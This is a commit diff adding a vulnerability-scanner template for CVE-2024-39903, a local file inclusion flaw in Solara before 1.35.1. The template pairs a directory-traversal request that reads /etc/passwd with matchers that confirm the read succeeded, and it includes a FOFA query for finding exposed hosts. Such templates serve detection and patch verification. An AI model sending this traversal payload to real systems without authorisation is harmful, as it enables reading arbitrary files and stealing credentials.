Create CVE-2024-39903.yaml

2024-07-25 15:09:32 +05:30 · 2024-07-25 15:09:32 +05:30 · 596de406d8
parent c129e43752
commit 596de406d8
1 changed files with 47 additions and 0 deletions
--- a/http/cves/2024/CVE-2024-39903.yaml
+++ b/http/cves/2024/CVE-2024-39903.yaml
@ -0,0 +1,47 @@
+id: CVE-2024-39903
+
+info:
+  name: Solara <1.35.1 - Local File Inclusion
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: high
+  description: |
+    A Local File Inclusion (LFI) vulnerability was identified in widgetti/solara, in version <1.35.1, which was fixed in version 1.35.1. This vulnerability arises from the application's failure to properly validate URI fragments for directory traversal sequences such as '../' when serving static files. An attacker can exploit this flaw by manipulating the fragment part of the URI to read arbitrary files on the local file system.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-39903
+    - https://github.com/widgetti/solara/commit/df2fd66a7f4e8ffd36e8678697a8a4f76760dc54
+    - https://github.com/widgetti/solara/security/advisories/GHSA-9794-pc4r-438w
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
+    cvss-score: 8.6
+    cve-id: CVE-2024-39903
+    cwe-id: CWE-22
+    epss-score: 0.00044
+    epss-percentile: 0.109
+  metadata:
+    fofa-query: icon_hash="-223126228"
+    verified: true
+    max-request: 1
+  tags: cve,cve2024,solara,lfi
+
+http:
+  - raw:
+      - |+
+        GET /static/nbextensions/#/../../../../../../../../../../etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+
+    unsafe: true
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: regex
+        part: content_type
+        regex:
+          - "text/plain"
+
+      - type: status
+        status:
+          - 200